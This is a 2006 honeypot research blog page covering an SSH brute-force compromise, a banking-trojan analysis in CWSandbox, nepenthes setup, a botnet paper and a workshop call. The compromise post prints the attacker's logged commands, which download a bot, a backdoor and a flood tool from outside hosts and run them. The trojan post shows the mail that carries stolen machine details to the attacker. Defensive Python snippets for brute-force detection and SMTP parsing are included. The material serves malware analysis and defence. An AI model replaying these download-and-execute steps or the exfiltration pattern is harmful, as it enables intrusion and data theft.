Honeypot Compromise: SSH Bruteforcing

Monday, October 30. 2006
About one month ago we had another compromise of one of our honeypots. The attacker came from the IP 71.116.213.XXX (static-71-116-213-XXX.lsanca.dsl-w.verizon.net), which is located in California, US (according to MaxMind). Later on he also used an IP located in Romania.

The compromise was not very interesting: the attacker used a tool for SSH bruteforcing and was able to guess the weak password of one user. He then installed an IRC bot and a backdoor on the compromised machine. Please find below the sanitized logging output of Sebek:

12:12:48 w
12:12:50 uname -a
12:12:54 passwd
12:12:43 w
12:12:53 ls
12:12:54 cd /tmp
12:12:55 ls
12:12:57 cd /var/tmp
12:12:57 ls
12:12:08 wget http://www.members.lycos.co.uk/XXX/mech.tar
12:12:15 wget http://free.7host06.com/XXX/linuxteam.tar.gz
12:12:29 wget http://free.7host06.com/XXX/flood
12:12:00 ls
12:12:04 tar zxvf mech.tar
12:12:06 cd mech
12:12:06 ls
12:12:10 pico mech1.users
12:12:12 nano mech1.users
12:12:16 mcedit mech1.users
12:12:19 vi mech1.users
[...]
12:12:07 vi kswap.set
[...]
12:12:28 ./inetd
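The compromise above follows the classic pattern that an auth log makes visible: a burst of failed password logins from one source address, then a single accepted login for a weak account. The following is an added example (not part of the original post and not Sebek output) that scores that pattern over constructed sshd syslog lines; the hostname, PIDs, the year (syslog omits it) and the TEST-NET source addresses are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of sshd syslog lines (not the honeypot's real log);
# source addresses come from the reserved documentation ranges.
SAMPLE_AUTH_LOG = """\
Oct 30 12:10:01 honeypot sshd[2201]: Failed password for root from 203.0.113.10 port 40122 ssh2
Oct 30 12:10:02 honeypot sshd[2203]: Failed password for invalid user admin from 203.0.113.10 port 40123 ssh2
Oct 30 12:10:03 honeypot sshd[2205]: Failed password for invalid user test from 203.0.113.10 port 40124 ssh2
Oct 30 12:10:04 honeypot sshd[2207]: Failed password for invalid user oracle from 203.0.113.10 port 40125 ssh2
Oct 30 12:10:05 honeypot sshd[2209]: Failed password for guest from 203.0.113.10 port 40126 ssh2
Oct 30 12:10:06 honeypot sshd[2211]: Accepted password for guest from 203.0.113.10 port 40127 ssh2
Oct 30 12:11:30 honeypot sshd[2230]: Failed password for alice from 198.51.100.7 port 51000 ssh2
Oct 30 12:11:45 honeypot sshd[2232]: Accepted publickey for alice from 198.51.100.7 port 51001 ssh2
"""

# Matches both "Failed password for [invalid user ]NAME from IP" and
# "Accepted password|publickey for NAME from IP" as OpenSSH writes them.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)


def parse_events(text, year=2006):
    """Yield (timestamp, result, user, ip); the year is assumed because syslog omits it."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        yield ts, m["result"], m["user"], m["ip"]


def detect_bruteforce(text, threshold=5, window=timedelta(minutes=1)):
    """Return {ip: {"bruteforce": True, "compromised_user": name_or_None}}.

    An address is flagged once it produces `threshold` failures inside `window`
    (a sliding window per source); an Accepted login from an already flagged
    address is recorded as a probable guessed password, which is exactly the
    weak-password compromise the post describes.
    """
    recent = defaultdict(deque)  # ip -> timestamps of failures still inside the window
    alerts = {}
    for ts, result, user, ip in parse_events(text):
        if result == "Failed":
            q = recent[ip]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()
            if len(q) >= threshold:
                alerts.setdefault(ip, {"bruteforce": True, "compromised_user": None})
        elif result == "Accepted" and ip in alerts:
            alerts[ip]["compromised_user"] = user
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, info)
```

A single failed login followed by a key-based success (the second address in the sample) is not reported, so the rule keys on the burst rather than on any failure; in production the threshold and window would be tuned against the normal failure rate of the host, and the "accepted after burst" condition is the one worth paging on.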

New contributor: David Watson

Monday, October 30. 2006
In the future, I will not be the only one who blogs on honeyblog.org. David Watson from the UK Honeynet Project will join me and blog about stories related to honeypots and honeynets.

SecurityFocus: "Viruses, Phishing, and Trojans For Profit"

Thursday, October 26. 2006
Kelly Martin from SecurityFocus published a nice article regarding the economic aspects of the underground: "Viruses, Phishing, and Trojans For Profit" is definitely an interesting read with links to many other articles. And I'm now off to start my YouTube :-)

Nepenthes and CWSandbox

Monday, October 23. 2006
It is also possible to use nepenthes together with CWSandbox: in the file submit-norman.cpp, change the line that sets the CURLOPT_URL option (line 174) from "http://sandbox.norman.no/live_4.html" to "http://luigi.informatik.uni-mannheim.de/submit.php?action=verify". All collected files are then sent to CWSandbox and the analysis reports arrive in your inbox.

The latest SVN version of nepenthes is able to submit binaries to Norman and CWSandbox, just take a look at changeset 674.

CWSandbox vs. Spy.Banker

Friday, October 20. 2006
From time to time we also get malware binaries that behave like a Trojan. This is an example of a Spy.Banker (as named by ClamAV), which tries to steal confidential financial information from compromised machines. The malware uses SMTP to send the information back to the attacker. The following mail is sent to the attacker and contains information about the compromised machine:

From: "!Mensagem [Cartao]!" 
Subject: FOO [Infectado por fataL]
To: xtinfecs@gmail.com
Date: Thu, 5 Oct 2006 01:15:26 +0200
X-Priority: 1
X-Library: Indy 9.00.10

!============fataL CorP============!
!Maquina?: FOO!
!Vítima LOGADA: !
!IP: 123.456.789.abc!
!Data de Abertura: 05.10.2006 Hora de Abertura: 01:15:24_
!Sistema?: Microsoft Windows XP (version 5.1)!
!Endereço da Placa: 00-AB-CD-EF-GH-00!
!============fataL CorP============!


The sandbox can also extract this kind of information since it parses the winsock communication and tries to extract information about different protocols. In addition to SMTP, CWSandbox is currently also capable of understanding IRC, HTTP, and FTP. The complete report is also available as HTML analysis and XML analysis.
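To make concrete what "parsing the winsock communication" yields for SMTP, here is an added example (not CWSandbox code, which is not shown on this page) that takes the client half of an SMTP session, as a sandbox would see it from the sample's send() calls, and recovers the envelope, the headers and the body, then pulls the "!Key: Value!" fields out of a body laid out like the report above. The captured stream, the mailboxes (reserved example domains) and the field layout are constructed to mirror the mail shown, not taken from a real sample.

```python
import email
import re

# Constructed client-side SMTP stream, the way a send()-only capture would look;
# no server replies are present. Addresses use the reserved .invalid TLD.
CAPTURED_SMTP = (
    b"EHLO victim-pc\r\n"
    b"MAIL FROM:<cartao@example.invalid>\r\n"
    b"RCPT TO:<dropbox@example.invalid>\r\n"
    b"DATA\r\n"
    b"From: \"!Mensagem [Cartao]!\" <cartao@example.invalid>\r\n"
    b"Subject: FOO [Infectado por fataL]\r\n"
    b"To: dropbox@example.invalid\r\n"
    b"X-Priority: 1\r\n"
    b"\r\n"
    b"!============fataL CorP============!\r\n"
    b"!Maquina?: FOO!\r\n"
    b"!IP: 192.0.2.44!\r\n"
    b"!Sistema?: Microsoft Windows XP (version 5.1)!\r\n"
    b"..a body line that started with a dot (dot-stuffed)\r\n"
    b"!============fataL CorP============!\r\n"
    b".\r\n"
    b"QUIT\r\n"
)

# "!Key: Value!" body lines; a trailing '?' on the key (as in "Maquina?") is dropped.
FIELD_RE = re.compile(r"^!(?P<k>[^:=]+?)\??:\s*(?P<v>.*?)!?$")


def parse_smtp_client_stream(data: bytes) -> dict:
    """Extract envelope sender/recipients, headers and body from an SMTP client stream.

    The DATA section ends at a line holding a single '.', and a leading '..' in a
    body line is unstuffed to '.' as RFC 5321 requires.
    """
    lines = data.split(b"\r\n")
    result = {"mail_from": None, "rcpt_to": [], "headers": {}, "body": ""}
    i = 0
    while i < len(lines):
        line = lines[i]
        upper = line.upper()
        if upper.startswith(b"MAIL FROM:"):
            result["mail_from"] = line.split(b":", 1)[1].strip().strip(b"<>").decode()
        elif upper.startswith(b"RCPT TO:"):
            result["rcpt_to"].append(line.split(b":", 1)[1].strip().strip(b"<>").decode())
        elif upper == b"DATA":
            msg_lines = []
            i += 1
            while i < len(lines) and lines[i] != b".":
                raw = lines[i]
                msg_lines.append(raw[1:] if raw.startswith(b"..") else raw)
                i += 1
            msg = email.message_from_bytes(b"\r\n".join(msg_lines))
            result["headers"] = {k: v for k, v in msg.items()}
            result["body"] = msg.get_payload()
        i += 1
    return result


def extract_fields(body: str) -> dict:
    """Turn the bot's '!Key: Value!' report lines into a dict of indicators."""
    fields = {}
    for line in body.splitlines():
        m = FIELD_RE.match(line.strip())
        if m and m["v"]:
            fields[m["k"].strip()] = m["v"].strip()
    return fields


if __name__ == "__main__":
    parsed = parse_smtp_client_stream(CAPTURED_SMTP)
    print(parsed["mail_from"], "->", parsed["rcpt_to"], "|", parsed["headers"].get("Subject"))
    print(extract_fields(parsed["body"]))
```

The envelope recipient (RCPT TO) is the value worth keeping as an indicator: it is where the stolen data actually goes, while the From and To headers are free text the malware author chose. Extending the same loop to IRC, HTTP or FTP only needs a different command grammar; the stream-splitting and the "end of payload" marker are protocol specific.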


A Multifaceted Approach to Understanding the Botnet Phenomenon

Thursday, October 19. 2006
At the upcoming Internet Measurement Conference 2006, one of the papers deals with botnets. The paper entitled "A Multifaceted Approach to Understanding the Botnet Phenomenon" by Moheeb Abu Rajab, Jay Zarfoss, Fabian Monrose, and Andreas Terzis from Johns Hopkins University presents results from their botnet studies. The data they have collected are very similar to the data we have collected at the German Honeynet Project. In fact, they use nepenthes as one of the basic building blocks of their system. They then analyze the collected binaries via "graybox testing" (logging of all network-related activity + active IRC testing) - perhaps CWSandbox would yield better results. The resulting botnet information is then used to track the botnet with a drone - an approach similar to the one we presented in the "Know your Enemy: Tracking Botnets" and our ESORICS'05 papers. They also use DNS cache snooping to learn more about malicious DNS entries.

Abstract:
The academic community has long acknowledged the existence of malicious botnets, however to date, very little is known about the behavior of these distributed computing platforms. To the best of our knowledge, botnet behavior has never been methodically studied, botnet prevalence on the Internet is mostly a mystery, and the botnet life cycle has yet to be modeled. Uncertainty abounds. In this paper, we attempt to clear the fog surrounding botnets by constructing a multifaceted and distributed measurement infrastructure. Throughout a period of more than three months, we used this infrastructure to track 192 unique IRC botnets of size ranging from a few hundred to several thousand infected end-hosts. Our results show that botnets represent a major contributor to unwanted Internet traffic—27% of all malicious connection attempts observed from our distributed darknet can be directly attributed to botnet-related spreading activity. Furthermore, we discovered evidence of botnet infections in 11% of the 800,000 DNS domains we examined, indicating a high diversity among botnet victims. Taken as a whole, these results not only highlight the prominence of botnets, but also provide deep insights that may facilitate further research to curtail this phenomenon.


Call for Papers: HotBots '07

Wednesday, October 18. 2006
The Call for Papers for the First Workshop on Hot Topics in Understanding Botnets (HotBots '07) is now available. I am very proud to be one of the members of the program committee and would love to see many submissions to the conference.

HotBots '07 will be co-located with the 4th USENIX Symposium on Networked Systems Design & Implementation (NSDI '07), which will take place April 11–13, 2007 in Cambridge, MA.

Important dates:
  • Paper submissions due: February 26, 2007

  • Notification to authors: March 19, 2007

  • Final papers due: April 2, 2007

The workshop itself will be held on April 10, 2007, in Cambridge, MA.

Overview:
Preliminary research or experience papers are solicited for the First Workshop on Hot Topics in Understanding Botnets (HotBots '07).

HotBots is intended as a forum for lively discussion of innovative ideas, recent progress, or practical experience in understanding all aspects of botnets. Intriguing preliminary results and thought-provoking ideas will be strongly favored. Papers will be selected for their potential to stimulate discussion in the workshop.


HotBots '07 will be a one-day event, Tuesday, April 10, 2007, co-located with the 4th USENIX Symposium on Networked Systems Design & Implementation (NSDI '07) in Cambridge, MA.

Workshop Format
To ensure a productive workshop environment, attendance will be by invitation and/or acceptance of paper submission.

Each author will have 15 minutes to present his or her idea, followed by 15 minutes of discussion with the workshop participants.
